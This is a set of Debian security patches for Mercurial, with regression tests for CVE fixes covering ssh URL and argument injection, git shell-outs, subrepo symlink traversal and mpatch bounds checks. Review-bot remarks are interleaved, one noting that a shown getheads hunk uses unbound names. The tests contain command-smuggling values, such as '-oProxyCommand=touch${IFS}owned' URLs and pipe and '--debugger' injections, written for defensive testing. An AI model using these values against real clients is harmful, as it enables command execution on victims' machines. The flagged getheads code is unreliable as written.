@@ -147,3 +147,29 @@ 4 files, 9 changesets, 7 total revisions $ cd .. + +SEC: check for unsafe ssh url + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg -R test-7 push 'ssh://-oProxyCommand=touch${IFS}owned/path' + pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg -R test-7 push 'ssh://%2DoProxyCommand=touch${IFS}owned/path' + pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg -R test-7 push 'ssh://fakehost|touch${IFS}owned/path' + pushing to ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path + abort: no suitable response from remote hg! + [255] + $ hg -R test-7 push 'ssh://fakehost%7Ctouch%20owned/path' + pushing to ssh://fakehost%7Ctouch%20owned/path + abort: no suitable response from remote hg! + [255] + + $ [ ! -f owned ] || echo 'you got owned' --- a/tests/test-subrepo-git.t +++ b/tests/test-subrepo-git.t 
@@ -600,3 +600,35 @@ whitelisting of ext should be respected (that's the git submodule behaviour) cloning subrepo s from ext::sh -c echo% pwned% >&2 abort: git clone error 128 in s (in subrepo s) [255] + +test for ssh exploit with git subrepos 2017-07-25 + + $ hg init malicious-proxycommand + $ cd malicious-proxycommand + $ echo 's = [git]ssh://-oProxyCommand=rm${IFS}non-existent/path' > .hgsub + $ git init s + Initialized empty Git repository in $TESTTMP/malicious-proxycommand/s/.git/ + $ cd s + $ git commit --allow-empty -m 'empty' + [master (root-commit) 153f934] empty + $ cd .. + $ hg add .hgsub + $ hg ci -m 'add subrepo' + $ cd .. + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepo s) + [255] + +also check that a percent encoded '-' (%2D) doesn't work + + $ cd malicious-proxycommand + $ echo 's = [git]ssh://%2DoProxyCommand=rm${IFS}non-existent/path' > .hgsub + $ hg ci -m 'change url to percent encoded' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepo s) + [255] + --- a/tests/test-subrepo-svn.t +++ b/tests/test-subrepo-svn.t 
@@ -632,3 +632,43 @@ well. Checked out revision 15. 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd .. + +SEC: test for ssh exploit + + $ hg init ssh-vuln + $ cd ssh-vuln + $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub + $ svn co --quiet "$SVNREPOURL"/src s + $ hg add .hgsub + $ hg ci -m1 + $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub + $ hg ci -m2 + $ cd .. + $ hg clone ssh-vuln ssh-vuln-clone + updating to branch default + abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s) + [255] + +also check that a percent encoded '-' (%2D) doesn't work + + $ cd ssh-vuln + $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub + $ hg ci -m3 + $ cd .. + $ rm -r ssh-vuln-clone + $ hg clone ssh-vuln ssh-vuln-clone + updating to branch default + abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s) + [255] + +also check that hiding the attack in the username doesn't work: + + $ cd ssh-vuln + $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub + $ hg ci -m3 + $ cd .. + $ rm -r ssh-vuln-clone + $ hg clone ssh-vuln ssh-vuln-clone + updating to branch default + abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepo s) + [255] --- a/tests/test-subrepo.t +++ b/tests/test-subrepo.t 
@@ -1233,3 +1233,76 @@ Courtesy phases synchronisation to publishing server does not block the push no changes found [1] +test for ssh exploit 2017-07-25 + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg init malicious-proxycommand + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://-oProxyCommand=touch${IFS}owned/path' > .hgsub + $ hg init s + $ cd s + $ echo init > init + $ hg add + adding init + $ hg commit -m init + $ cd .. + $ hg add .hgsub + $ hg ci -m 'add subrepo' + $ cd .. + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepo s) + [255] + +also check that a percent encoded '-' (%2D) doesn't work + + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://%2DoProxyCommand=touch${IFS}owned/path' > .hgsub + $ hg ci -m 'change url to percent encoded' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepo s) + [255] + +also check for a pipe + + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://fakehost|touch${IFS}owned/path' > .hgsub + $ hg ci -m 'change url to pipe' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: no suitable response from remote hg! + [255] + $ [ ! -f owned ] || echo 'you got owned' + +also check that a percent encoded '|' (%7C) doesn't work + + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://fakehost%7Ctouch%20owned/path' > .hgsub + $ hg ci -m 'change url to percent encoded pipe' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: no suitable response from remote hg! + [255] + $ [ ! 
-f owned ] || echo 'you got owned' + +and bad usernames: + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://-oProxyCommand=touch owned@example.com/path' > .hgsub + $ hg ci -m 'owned username' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch owned@example.com/path' (in subrepo s) + [255] debian/patches/CVE-2017-9462.patch0000664000000000000000000001465113375561147013271 0ustar # HG changeset patch # User Augie Fackler # Date 1492021435 25200 # Node ID 77eaf9539499a1b8be259ffe7ada787d07857f80 # Parent 68f263f52d2e3e2798b4f1e55cb665c6b043f93b dispatch: protect against malicious 'hg serve --stdio' invocations (sec) Some shared-ssh installations assume that 'hg serve --stdio' is a safe command to run for minimally trusted users. Unfortunately, the messy implementation of argument parsing here meant that trying to access a repo named '--debugger' would give the user a pdb prompt, thereby sidestepping any hoped-for sandboxing. Serving repositories over HTTP(S) is unaffected. We're not currently hardening any subcommands other than 'serve'. If your service exposes other commands to users with arbitrary repository names, it is imperative that you defend against repository names of '--debugger' and anything starting with '--config'. The read-only mode of hg-ssh stopped working because it provided its hook configuration to "hg serve --stdio" via --config parameter. This is banned for security reasons now. This patch switches it to directly call ui.setconfig(). If your custom hosting infrastructure relies on passing --config to "hg serve --stdio", you'll need to find a different way to get that configuration into Mercurial, either by using ui.setconfig() as hg-ssh does in this patch, or by placing an hgrc file someplace where Mercurial will read it. 
mitrandir@fb.com provided some extra fixes for the dispatch code and for hg-ssh in places that I overlooked. diff -r 68f263f52d2e -r 77eaf9539499 contrib/hg-ssh --- a/contrib/hg-ssh Mon Apr 03 17:34:24 2017 -0400 +++ b/contrib/hg-ssh Wed Apr 12 11:23:55 2017 -0700 @@ -32,7 +32,7 @@ command="hg-ssh --read-only repos/*" # enable importing on demand to reduce startup time from mercurial import demandimport; demandimport.enable() -from mercurial import dispatch +from mercurial import dispatch, ui as uimod import sys, os, shlex @@ -61,14 +61,15 @@ def main(): repo = os.path.normpath(os.path.join(cwd, os.path.expanduser(path))) if repo in allowed_paths: cmd = ['-R', repo, 'serve', '--stdio'] + req = dispatch.request(cmd) if readonly: - cmd += [ - '--config', - 'hooks.prechangegroup.hg-ssh=python:__main__.rejectpush', - '--config', - 'hooks.prepushkey.hg-ssh=python:__main__.rejectpush' - ] - dispatch.dispatch(dispatch.request(cmd)) + if not req.ui: + req.ui = uimod.ui() + req.ui.setconfig('hooks', 'prechangegroup.hg-ssh', + 'python:__main__.rejectpush', 'hg-ssh') + req.ui.setconfig('hooks', 'prepushkey.hg-ssh', + 'python:__main__.rejectpush', 'hg-ssh') + dispatch.dispatch(req) else: sys.stderr.write('Illegal repository "%s"\n' % repo) sys.exit(255) diff -r 68f263f52d2e -r 77eaf9539499 mercurial/dispatch.py --- a/mercurial/dispatch.py Mon Apr 03 17:34:24 2017 -0400 +++ b/mercurial/dispatch.py Wed Apr 12 11:23:55 2017 -0700 @@ -6,6 +6,7 @@ # GNU General Public License version 2 or any later version. from i18n import _ +import getopt import os, sys, atexit, signal, pdb, socket, errno, shlex, time, traceback, re import util, commands, hg, fancyopts, extensions, hook, error import cmdutil, encoding 
@@ -86,6 +87,37 @@ def _runcatch(req): except ValueError: pass # happens if called in a thread + realcmd = None + try: + cmdargs = fancyopts.fancyopts(req.args[:], commands.globalopts, {}) + cmd = cmdargs[0] + aliases, entry = cmdutil.findcmd(cmd, commands.table, False) + realcmd = aliases[0] + except (error.UnknownCommand, error.AmbiguousCommand, + IndexError, getopt.GetoptError): + # Don't handle this here. We know the command is + # invalid, but all we're worried about for now is that + # it's not a command that server operators expect to + # be safe to offer to users in a sandbox. + pass + if realcmd == 'serve' and '--stdio' in cmdargs: + # We want to constrain 'hg serve --stdio' instances pretty + # closely, as many shared-ssh access tools want to grant + # access to run *only* 'hg -R $repo serve --stdio'. We + # restrict to exactly that set of arguments, and prohibit + # any repo name that starts with '--' to prevent + # shenanigans wherein a user does something like pass + # --debugger or --config=ui.debugger=1 as a repo + # name. This used to actually run the debugger. + if (len(req.args) != 4 or + req.args[0] != '-R' or + req.args[1].startswith('--') or + req.args[2] != 'serve' or + req.args[3] != '--stdio'): + ui.warn(_("abort: potentially unsafe serve --stdio invocation: %r\n") % + (req.args,)) + return -1 + try: try: debugger = 'pdb' diff -r 68f263f52d2e -r 77eaf9539499 tests/test-ssh.t --- a/tests/test-ssh.t Mon Apr 03 17:34:24 2017 -0400 +++ b/tests/test-ssh.t Wed Apr 12 11:23:55 2017 -0700 
@@ -291,6 +291,19 @@ Test (non-)escaping of remote paths with spaces when cloning (issue3145): abort: destination 'a repo' is not empty [255] +Make sure hg is really paranoid in serve --stdio mode. It used to be +possible to get a debugger REPL by specifying a repo named --debugger. + $ hg -R --debugger serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] + [255] + $ hg -R --config=ui.debugger=yes serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] + [255] +Abbreviations of 'serve' also don't work, to avoid shenanigans. + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] + [255] + Test hg-ssh using a helper script that will restore PYTHONPATH (which might have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right parameters: --- a/tests/test-hup.t +++ b/tests/test-hup.t @@ -3,7 +3,7 @@ Test hangup signal in the middle of transaction $ "$TESTDIR/hghave" serve fifo || exit 80 $ hg init $ mkfifo p - $ hg serve --stdio < p 1>out 2>&1 & + $ hg -R . serve --stdio < p 1>out 2>&1 & $ P=$! Do test while holding fifo open debian/patches/CVE-2016-3069_part2.patch0000664000000000000000000001635713375253775014407 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458691511 25200 # Node ID cdda7b96afff3433eafdeeb83ded83a5b25b7a5b # Parent 197eed39e3d5e9a8cadfd9ba5839eb14cc265caa convert: rewrite calls to Git to use the new shelling mechanism (SEC) CVE-2016-3069 (2/5) One test output changed because we were ignoring git return code in numcommits before. diff -r 197eed39e3d5 -r cdda7b96afff hgext/convert/git.py --- a/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 +++ b/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 
@@ -102,19 +102,19 @@ class convert_git(converter_source, commandline): def getheads(self): if not self.rev: - heads, ret = self.gitread('git rev-parse --branches --remotes') - heads = heads.splitlines() + output, status = self.gitrun('rev-parse', '--branches', '--remotes') + heads = output.splitlines() else: - heads, ret = self.gitread("git rev-parse --verify %s" % self.rev) - heads = [heads[:-1]] - if ret: + rawhead, ret = self.gitrun('rev-parse', '--verify', rev) + heads.append(rawhead[:-1]) + if status: raise util.Abort(_('cannot retrieve git heads')) return heads def catfile(self, rev, type): if rev == hex(nullid): raise IOError - data, ret = self.gitread("git cat-file %s %s" % (type, rev)) + data, ret = self.gitrun('cat-file', type, rev) if ret: raise util.Abort(_('cannot read %r object at %s') % (type, rev)) return data @@ -153,25 +153,27 @@ class convert_git(converter_source, commandline): self.submodules.append(submodule(s['path'], '', s['url'])) def retrievegitmodules(self, version): - modules, ret = self.gitread("git show %s:%s" % (version, '.gitmodules')) + modules, ret = self.gitrun('show','%s:%s' % (version, '.gitmodules')) if ret: raise util.Abort(_('cannot read submodules config file in %s') % version) self.parsegitmodules(modules) for m in self.submodules: - node, ret = self.gitread("git rev-parse %s:%s" % (version, m.path)) + node, ret = self.gitrun('rev-parse', '%s:%s' % (version, m.path)) if ret: continue m.node = node.strip() def getchanges(self, version): self.modecache = {} - fh = self.gitopen("git diff-tree -z --root -m -r %s" % version) + output, status = self.gitrun('diff-tree', '-z', '--root', '-m', '-r', version) + if status: + raise util.Abort(_('cannot read changes in %s') % version) changes = [] seen = set() entry = None subexists = False - for l in fh.read().split('\x00'): + for l in output.split('\x00'): if not entry: if not l.startswith(':'): continue 
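Review bot: The `else:` branch of `getheads` (taken when `self.rev` is set) uses three names that are not bound there. It passes `rev` instead of `self.rev`, calls `heads.append(...)` before `heads` is assigned, and stores the exit code in `ret` while the following `if status:` reads `status`. As written, that branch would fail with a NameError instead of returning the head or raising the intended `cannot retrieve git heads` abort. The two lines should read `rawhead, status = self.gitrun('rev-parse', '--verify', self.rev)` and `heads = [rawhead[:-1]]`.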
@@ -194,8 +196,6 @@ class convert_git(converter_source, commandline): self.modecache[(f, h)] = (p and "x") or (s and "l") or "" changes.append((f, h)) entry = None - if fh.close(): - raise util.Abort(_('cannot read changes in %s') % version) if subexists: self.retrievegitmodules(version) @@ -240,12 +240,14 @@ class convert_git(converter_source, commandline): def gettags(self): tags = {} alltags = {} - fh = self.gitopen('git ls-remote --tags "%s"' % self.path, - err=subprocess.STDOUT) + output, status = self.gitrunlines('ls-remote', '--tags', self.path) + + if status: + raise util.Abort(_('cannot read tags from %s') % self.path) prefix = 'refs/tags/' # Build complete list of tags, both annotated and bare ones - for line in fh: + for line in output: line = line.strip() if line.startswith("error:") or line.startswith("fatal:"): raise util.Abort(_('cannot read tags from %s') % self.path) @@ -253,8 +255,6 @@ class convert_git(converter_source, commandline): if not tag.startswith(prefix): continue alltags[tag[len(prefix):]] = node - if fh.close(): - raise util.Abort(_('cannot read tags from %s') % self.path) # Filter out tag objects for annotated tag refs for tag in alltags: 
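Review bot: In `gettags` the loop still aborts on lines starting with `error:` or `fatal:`, but the old call merged stderr into the stream (`err=subprocess.STDOUT`) and the new `self.gitrunlines('ls-remote', '--tags', self.path)` does not ask for that. Whether `gitrunlines` captures stderr is not visible here; if it does not, the prefix check can no longer match and only the exit status guards the read. The tests/test-convert-git.t hunk in this patch fits that reading: converting the repository with the renamed commit object used to end in `abort: cannot read tags from git-repo4/.git` and is now expected to reach `converting...` without an abort. I would confirm that a damaged source is still reported somewhere, and either drop the prefix check or mark it with `# git diagnostics arrive on stderr; the exit status is the real guard`. `gettags` continues outside the hunk.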
@@ -271,18 +271,22 @@ class convert_git(converter_source, commandline): def getchangedfiles(self, version, i): changes = [] if i is None: - fh = self.gitopen("git diff-tree --root -m -r %s" % version) - for l in fh: + output, status = self.gitrunlines('diff-tree', '--root', '-m', + '-r', version) + if status: + raise util.Abort(_('cannot read changes in %s') % version) + for l in output: if "\t" not in l: continue m, f = l[:-1].split("\t") changes.append(f) else: - fh = self.gitopen('git diff-tree --name-only --root -r %s ' - '"%s^%s" --' % (version, version, i + 1)) - changes = [f.rstrip('\n') for f in fh] - if fh.close(): - raise util.Abort(_('cannot read changes in %s') % version) + output, status = self.gitrunlines('diff-tree', '--name-only', + '--root', '-r', version, + '%s^%s' % (version, i + 1), '--') + if status: + raise util.Abort(_('cannot read changes in %s') % version) + changes = [f.rstrip('\n') for f in output] return changes @@ -294,14 +298,14 @@ class convert_git(converter_source, commandline): prefixlen = len(prefix) # factor two commands - gitcmd = { 'remote/': 'git ls-remote --heads origin', - '': 'git show-ref'} + gitcmd = { 'remote/': ['ls-remote', '--heads', 'origin'], + '': ['show-ref']} # Origin heads for reftype in gitcmd: try: - fh = self.gitopen(gitcmd[reftype], err=subprocess.PIPE) - for line in fh: + output, status = self.gitrunlines(*gitcmd[reftype]) + for line in output: line = line.strip() rev, name = line.split(None, 1) if not name.startswith(prefix): --- a/tests/test-convert-git.t +++ b/tests/test-convert-git.t 
@@ -374,8 +374,11 @@ cd ../../.. damage git repository by renaming a commit object $ COMMIT_OBJ=1c/0ce3c5886f83a1d78a7b517cdff5cf9ca17bdd $ mv git-repo4/.git/objects/$COMMIT_OBJ git-repo4/.git/objects/$COMMIT_OBJ.tmp - $ hg convert git-repo4 git-repo4-broken-hg 2>&1 | grep 'abort:' - abort: cannot read tags from git-repo4/.git + $ hg convert git-repo4 git-repo4-broken-hg + initializing destination git-repo4-broken-hg repository + scanning source... + sorting... + converting... $ mv git-repo4/.git/objects/$COMMIT_OBJ.tmp git-repo4/.git/objects/$COMMIT_OBJ damage git repository by renaming a blob object debian/patches/CVE-2016-3069_part1.patch0000664000000000000000000000451313373604032014355 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458691511 25200 # Node ID 197eed39e3d5e9a8cadfd9ba5839eb14cc265caa # Parent 34d43cb85de8d06764039d8868eee19d00fddeab convert: add new, non-clowny interface for shelling out to git (SEC) CVE-2016-3069 (1/5) To avoid shell injection and for the sake of simplicity let's use the common.commandline for calling git. diff -r 34d43cb85de8 -r 197eed39e3d5 hgext/convert/git.py --- a/hgext/convert/git.py Sun Mar 20 21:52:21 2016 -0700 +++ b/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 @@ -11,7 +11,7 @@ from mercurial import util, config from mercurial.node import hex, nullid from mercurial.i18n import _ -from common import NoRepo, commit, converter_source, checktool +from common import NoRepo, commit, converter_source, checktool, commandline class submodule(object): def __init__(self, path, node, url): @@ -25,7 +25,7 @@ class submodule(object): def hgsubstate(self): return "%s %s" % (self.node, self.path) -class convert_git(converter_source): +class convert_git(converter_source, commandline): # Windows does not support GIT_DIR= construct while other systems # cannot remove environment variable. Just assume none have # both issues. 
@@ -56,6 +56,21 @@ class convert_git(converter_source): else: return util.popen('GIT_DIR=%s %s' % (self.path, s), 'rb') + def _gitcmd(self, cmd, *args, **kwargs): + return cmd('--git-dir=%s' % self.path, *args, **kwargs) + + def gitrun0(self, *args, **kwargs): + return self._gitcmd(self.run0, *args, **kwargs) + + def gitrun(self, *args, **kwargs): + return self._gitcmd(self.run, *args, **kwargs) + + def gitrunlines0(self, *args, **kwargs): + return self._gitcmd(self.runlines0, *args, **kwargs) + + def gitrunlines(self, *args, **kwargs): + return self._gitcmd(self.runlines, *args, **kwargs) + def popen_with_stderr(self, s): p = subprocess.Popen(s, shell=True, bufsize=-1, close_fds=util.closefds, @@ -73,6 +88,7 @@ class convert_git(converter_source): def __init__(self, ui, path, rev=None): super(convert_git, self).__init__(ui, path, rev=rev) + commandline.__init__(self, ui, 'git') if os.path.isdir(path + "/.git"): path += "/.git" debian/patches/CVE-2017-17458_part2.patch0000664000000000000000000000525013373604311014445 0ustar # HG changeset patch # User Yuya Nishihara # Date 1509707570 -32400 # Node ID 071cbeba421217d722a69a5d614ec934684d62d5 # Parent 80d7dbda92940c49e0fd66230ae07cd526b3629c subrepo: disallow symlink traversal across subrepo mount point (SEC) It wasn't easy to extend the pathauditor to check symlink traversal across subrepos because pathauditor._checkfs() rejects a directory having ".hg" directory. That's why I added the explicit islink() check. No idea if this patch is necessary after we've fixed the issue5730 by splitting submerge() into planning and execution phases. diff -r 80d7dbda9294 -r 071cbeba4212 mercurial/subrepo.py --- a/mercurial/subrepo.py Fri Nov 03 19:17:25 2017 +0900 +++ b/mercurial/subrepo.py Fri Nov 03 20:12:50 2017 +0900 
@@ -334,6 +334,12 @@ def itersubrepos(ctx1, ctx2): for subpath, ctx in sorted(subpaths.iteritems()): yield subpath, ctx.sub(subpath) +def _auditsubrepopath(repo, path): + # auditor doesn't check if the path itself is a symlink + scmutil.pathauditor(repo.root)(path) + if repo.wvfs.islink(path): + raise error.Abort(_("subrepo '%s' traverses symbolic link") % path) + def subrepo(ctx, path): """return instance of the right subrepo class for subrepo in path""" # subrepo inherently violates our import layering rules @@ -344,7 +350,7 @@ def subrepo(ctx, path): import hg as h hg = h - scmutil.pathauditor(ctx._repo.root)(path) + _auditsubrepopath(ctx._repo, path) state = ctx.substate[path] if state[2] not in types: raise util.Abort(_('unknown subrepo type %s') % state[2]) diff -r 80d7dbda9294 -r 071cbeba4212 tests/test-audit-subrepo.t --- a/tests/test-audit-subrepo.t Fri Nov 03 19:17:25 2017 +0900 +++ b/tests/test-audit-subrepo.t Fri Nov 03 20:12:50 2017 +0900 @@ -50,17 +50,35 @@ on commit: $ hg ci -qAm 'add symlink "out"' $ hg init ../out $ echo 'out = out' >> .hgsub -BROKEN: should fail $ hg ci -qAm 'add subrepo "out"' + abort: subrepo 'out' traverses symbolic link + [255] + +prepare tampered repo (including the commit above): + + $ hg import --bypass -qm 'add subrepo "out"' - <<'EOF' + > diff --git a/.hgsub b/.hgsub + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsub + > @@ -0,0 +1,1 @@ + > +out = out + > diff --git a/.hgsubstate b/.hgsubstate + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsubstate + 
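Review bot: `_auditsubrepopath` raises `error.Abort`, while `subrepo()` a few lines below raises `util.Abort` for the unknown-type case. Using one spelling in both places keeps the module consistent, e.g. `raise util.Abort(_("subrepo '%s' traverses symbolic link") % path)`. The helper has only an inline comment; a docstring such as `"""abort if path fails the path audit or is itself a symbolic link"""` would state its contract. It is also worth noting there that the `islink()` test runs once, when `subrepo()` is called, so it describes the working directory at that moment only.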
> @@ -0,0 +1,1 @@ + > +0000000000000000000000000000000000000000 out + > EOF $ cd ../.. on clone (and update): $ mkdir hgsymdir2 -BROKEN: should fail to update $ hg clone -q hgsymdir/root hgsymdir2/root + abort: subrepo 'out' traverses symbolic link + [255] $ ls hgsymdir2 - out root #endif debian/patches/deb_specific__fix_hg-ssh_interpreter.patch0000664000000000000000000000110712230221467021136 0ustar Author: Javi Merino Description: Fix python interpreter for hg-ssh hg-ssh is installed by dh_install instead of setup.py, so it's interpreter is not fixed automatically for us. System-wide commands should use /usr/bin/python as the Debian Python Policy recommends. Bug-Debian: http://bugs.debian.org/654925 Bug-Ubuntu: https://bugs.launchpad.net/bugs/912625 Forwarded: not-needed --- a/contrib/hg-ssh +++ b/contrib/hg-ssh @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/python # # Copyright 2005-2007 by Intevation GmbH # debian/patches/CVE-2016-3630_part2.patch0000664000000000000000000000155113373604123014350 0ustar # HG changeset patch # User Matt Mackall # Date 1458174626 25200 # Node ID b9714d958e89cd6ff1da46b46f39076c03325ac7 # Parent b6ed2505d6cf1d73f7f5c62e7369c4ce65cd3732 parsers: detect short records (SEC) CVE-2016-3630 (2/2) This addresses part of a vulnerability in binary delta application. diff -r b6ed2505d6cf -r b9714d958e89 mercurial/mpatch.c --- a/mercurial/mpatch.c Wed Mar 16 17:29:29 2016 -0700 +++ b/mercurial/mpatch.c Wed Mar 16 17:30:26 2016 -0700 
@@ -215,10 +215,10 @@ static struct flist *decode(const char *bin, Py_ssize_t len) lt->start = getbe32(bin + pos); lt->end = getbe32(bin + pos + 4); lt->len = getbe32(bin + pos + 8); - if (lt->start > lt->end) - break; /* sanity check */ lt->data = bin + pos + 12; pos += 12 + lt->len; + if (lt->start > lt->end || lt->len < 0) + break; /* sanity check */ lt++; } debian/patches/CVE-2018-13347.patch0000664000000000000000000000214013373604440013325 0ustar # HG changeset patch # User Augie Fackler # Date 1524895496 14400 # Node ID 1acfc35d478cdae60cf62c6f07fa6b6ad3070ea7 # Parent 90a274965de74cb0b4bea01a564b29b12a6af814 mpatch: protect against underflow in mpatch_apply (SEC) Also caught by oss-fuzz fuzzer during development. This defect is OVE-20180430-0002 or CVE-2018-13347. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -263,7 +263,7 @@ static int apply(char *buf, const char *orig, Py_ssize_t len, struct flist *l) char *p = buf; while (f != l->tail) { - if (f->start < last || f->end > len) { + if (f->start < last || f->end > len || last < 0) { if (!PyErr_Occurred()) PyErr_SetString(mpatch_Error, "invalid patch"); @@ -276,6 +276,12 @@ static int apply(char *buf, const char *orig, Py_ssize_t len, struct flist *l) p += f->len; f++; } + if (last < 0) { + if (!PyErr_Occurred()) + PyErr_SetString(mpatch_Error, + "invalid patch"); + return 0; + } memcpy(p, orig + last, len - last); return 1; } debian/patches/proposed_upstream__correct-zeroconf-doc0000664000000000000000000000121612230221473020557 0ustar Correct the documentation for the zeroconf extension. --- a/hgext/zeroconf/__init__.py +++ b/hgext/zeroconf/__init__.py 
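Review bot: The sanity check in `decode` now rejects a negative `lt->len`, but it still accepts a record whose `lt->start` is negative, because `lt->start > lt->end` is the only test on the offsets. The `lt->len < 0` test suggests these fields are signed, though their declaration is outside the hunk. The check also runs after `pos += 12 + lt->len`, so a rejected record leaves `pos` advanced by a length that was never validated. I would test before advancing and include the lower bound, `if (lt->start < 0 || lt->start > lt->end || lt->len < 0) break;`, placed ahead of the `lt->data` assignment. The loop condition and the code that reads `pos` after the loop are outside the hunk, so their interaction with the early `break` should be confirmed.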
@@ -7,9 +7,9 @@ '''discover and advertise repositories on the local network -Zeroconf-enabled repositories will be announced in a network without -the need to configure a server or a service. They can be discovered -without knowing their actual IP address. +The zeroconf extension will advertise :hg:`serve` instances over +DNS-SD so that they can be discovered using the :hg:`paths` command +without knowing the server's address. To allow other people to discover your repository using run :hg:`serve` in your repository:: debian/patches/CVE-2017-1000115.patch0000664000000000000000000002323613375307467013476 0ustar Description: symlink traversal fix for CVE-2017-1000115 This is a backport of two upstream patches from "stable" released as part of 4.3.1. Some interpretation was necessary for the patch to apply at all, but it is believed all use cases are covered, as the upstream-provided tests pass. One tests for the `files` command was removed as the command doesn't exist in 2.2.2. Author: Antoine Beaupré Bug-Debian: https://bugs.debian.org/871709 Origin: upstream, https://www.mercurial-scm.org/repo/hg/rev/47ea28293d30 and https://www.mercurial-scm.org/repo/hg/rev/377e8ddaebef Forwarded: not-needed Last-Update: 2017-08-28 --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -2063,7 +2063,7 @@ def revert(ui, repo, ctx, parents, *pats, **opts): fc = ctx[f] repo.wwrite(f, fc.data(), fc.flags()) - audit_path = scmutil.pathauditor(repo.root) + audit_path = scmutil.pathauditor(repo.root, cached=True) for f in remove[0]: if repo.dirstate[f] == 'a': repo.dirstate.drop(f) --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py 
@@ -736,7 +736,7 @@ class dirstate(object): # unknown == True means we walked the full directory tree above. # So if a file is not seen it was either a) not matching matchfn # b) ignored, c) missing, or d) under a symlink directory. - audit_path = scmutil.pathauditor(self._root) + audit_path = scmutil.pathauditor(self._root, cached=True) for nf in iter(visit): # Report ignored items in the dmap as long as they are not --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -166,8 +166,9 @@ class localrepository(object): self.root = self.wvfs.base self.path = self.wvfs.join(".hg") self.origroot = path - self.auditor = scmutil.pathauditor(self.root, self._checknested) - self.vfs = scmutil.vfs(self.path) + self.auditor = scmutil.pathauditor(self.root, self._checknested, + cached=True) + self.vfs = scmutil.vfs(self.path, cacheaudited=True) self.opener = self.vfs self.baseui = baseui self.ui = baseui.copy() @@ -238,7 +239,7 @@ class localrepository(object): if inst.errno != errno.ENOENT: raise - self.store = store.store(requirements, self.sharedpath, scmutil.vfs) + self.store = store.store(requirements, self.sharedpath, lambda base: scmutil.vfs(base, cacheaudited=True)) self.spath = self.store.path self.svfs = self.store.vfs self.sopener = self.svfs --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py 
@@ -122,12 +122,17 @@ class pathauditor(object): - traverses a symlink (e.g. a/symlink_here/b) - inside a nested repository (a callback can be used to approve some nested repositories, e.g., subrepositories) + + If 'cached' is set to True, audited paths and sub-directories are cached. + Be careful to not keep the cache of unmanaged directories for long because + audited paths may be replaced with symlinks. ''' - def __init__(self, root, callback=None): + def __init__(self, root, callback=None, cached=False): self.audited = set() self.auditeddir = set() self.root = root + self._cached = cached self.callback = callback if os.path.lexists(root) and not util.checkcase(root): self.normcase = util.normcase @@ -200,10 +205,11 @@ class pathauditor(object): parts.pop() normparts.pop() - self.audited.add(normpath) - # only add prefixes to the cache after checking everything: we don't - # want to add "foo/bar/baz" before checking if there's a "foo/.hg" - self.auditeddir.update(prefixes) + if self._cached: + self.audited.add(normpath) + # only add prefixes to the cache after checking everything: we don't + # want to add "foo/bar/baz" before checking if there's a "foo/.hg" + self.auditeddir.update(prefixes) def check(self, path): try: 
